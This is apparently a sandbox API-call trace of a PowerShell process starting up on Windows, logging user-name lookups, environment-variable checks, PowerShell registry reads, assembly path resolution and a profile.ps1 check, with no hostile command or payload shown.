	[0295.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x12ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.191] SetErrorMode (uMode=0x1) returned 0x1
	[0295.191] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d430 | out: lpFileInformation=0x12d430*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.191] SetErrorMode (uMode=0x1) returned 0x1
	[0295.769] CoTaskMemAlloc (cb=0x804) returned 0x1b8b6600
	[0295.769] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8b6600, nSize=0x12d798 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d798) returned 0x1
	[0295.769] CoTaskMemFree (pv=0x1b8b6600) 
	[0295.769] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0295.769] GetUserNameW (in: lpBuffer=0x206630, pcbBuffer=0x12d7d8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d7d8) returned 1
	[0295.770] CoTaskMemFree (pv=0x206630) 
	[0295.770] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f83c48*="Available", lpRawData=0x2f839d8) returned 1
	[0295.937] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0295.937] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.937] CoTaskMemFree (pv=0x24c0b0) 
	[0295.938] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0295.938] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.938] CoTaskMemFree (pv=0x24c0b0) 
	[0295.940] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0295.940] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0295.940] CoTaskMemFree (pv=0x24c0b0) 
	[0295.940] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0295.940] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0295.940] CoTaskMemFree (pv=0x24c0b0) 
	[0295.943] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d7b8 | out: phkResult=0x12d7b8*=0x3ac) returned 0x0
	[0295.943] RegQueryValueExW (in: hKey=0x3ac, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d73c, lpData=0x0, lpcbData=0x12d738*=0x0 | out: lpType=0x12d73c*=0x1, lpData=0x0, lpcbData=0x12d738*=0x56) returned 0x0
	[0295.943] CoTaskMemAlloc (cb=0x5a) returned 0x1b8a75d0
	[0295.943] RegQueryValueExW (in: hKey=0x3ac, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d70c, lpData=0x1b8a75d0, lpcbData=0x12d708*=0x56 | out: lpType=0x12d70c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d708*=0x56) returned 0x0
	[0295.943] CoTaskMemFree (pv=0x1b8a75d0) 
	[0295.943] RegCloseKey (hKey=0x3ac) returned 0x0
	[0295.944] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0295.944] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.944] CoTaskMemFree (pv=0x24c0b0) 
	[0295.978] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.980] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0295.980] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.980] CoTaskMemFree (pv=0x24c0b0) 
	[0295.981] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.676] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0296.676] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0296.676] CoTaskMemFree (pv=0x24c0b0) 
	[0296.677] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0296.677] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0296.677] CoTaskMemFree (pv=0x24c0b0) 
	[0296.677] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0296.677] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0296.677] CoTaskMemFree (pv=0x24c0b0) 
	[0296.679] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0296.679] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0296.679] CoTaskMemFree (pv=0x24c0b0) 
	[0296.683] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0296.683] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0296.683] CoTaskMemFree (pv=0x24c0b0) 
	[0296.683] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0296.684] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0296.684] CoTaskMemFree (pv=0x24c0b0) 
	[0296.697] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.697] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.143] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.870] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0298.870] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0298.870] CoTaskMemFree (pv=0x24c0b0) 
	[0299.708] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x24c4f0
	[0300.185] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x24c600
	[0304.282] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.283] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.283] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.284] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.285] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.286] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.286] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.287] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.288] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.288] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.288] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.288] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.288] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.288] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.288] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.289] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.289] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.289] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.289] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.289] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.289] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.289] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.289] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.289] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.289] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.290] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.290] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.290] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.290] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.293] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0304.293] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.293] CoTaskMemFree (pv=0x24c710) 
	[0304.297] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0304.297] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.297] CoTaskMemFree (pv=0x24c710) 
	[0304.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.201] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0306.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.205] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0306.205] VirtualQuery (in: lpAddress=0x12b310, lpBuffer=0x12c1d0, dwLength=0x30 | out: lpBuffer=0x12c1d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0306.205] VirtualQuery (in: lpAddress=0x12b310, lpBuffer=0x12c1d0, dwLength=0x30 | out: lpBuffer=0x12c1d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0306.206] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d918 | out: phkResult=0x12d918*=0x2e0) returned 0x0
	[0306.206] RegQueryValueExW (in: hKey=0x2e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d89c, lpData=0x0, lpcbData=0x12d898*=0x0 | out: lpType=0x12d89c*=0x1, lpData=0x0, lpcbData=0x12d898*=0x56) returned 0x0
	[0306.206] CoTaskMemAlloc (cb=0x5a) returned 0x1b8c2530
	[0306.206] RegQueryValueExW (in: hKey=0x2e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d86c, lpData=0x1b8c2530, lpcbData=0x12d868*=0x56 | out: lpType=0x12d86c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d868*=0x56) returned 0x0
	[0306.206] CoTaskMemFree (pv=0x1b8c2530) 
	[0306.206] RegCloseKey (hKey=0x2e0) returned 0x0
	[0306.207] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d918 | out: phkResult=0x12d918*=0x2e0) returned 0x0
	[0306.207] RegQueryValueExW (in: hKey=0x2e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d89c, lpData=0x0, lpcbData=0x12d898*=0x0 | out: lpType=0x12d89c*=0x1, lpData=0x0, lpcbData=0x12d898*=0x56) returned 0x0
	[0306.207] CoTaskMemAlloc (cb=0x5a) returned 0x1b8c2530
	[0306.207] RegQueryValueExW (in: hKey=0x2e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d86c, lpData=0x1b8c2530, lpcbData=0x12d868*=0x56 | out: lpType=0x12d86c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d868*=0x56) returned 0x0
	[0306.207] CoTaskMemFree (pv=0x1b8c2530) 
	[0306.207] RegCloseKey (hKey=0x2e0) returned 0x0
	[0306.207] CoTaskMemAlloc (cb=0x20c) returned 0x1b898970
	[0306.207] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b898970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0306.207] CoTaskMemFree (pv=0x1b898970) 
	[0306.207] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0306.207] CoTaskMemAlloc (cb=0x20c) returned 0x1b898970
	[0306.208] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b898970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0306.208] CoTaskMemFree (pv=0x1b898970) 
	[0306.208] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0306.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x12d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0306.208] SetErrorMode (uMode=0x1) returned 0x1
	[0306.208] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12d880 | out: lpFileInformation=0x12d880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0306.208] SetErrorMode (uMode=0x1) returned 0x1
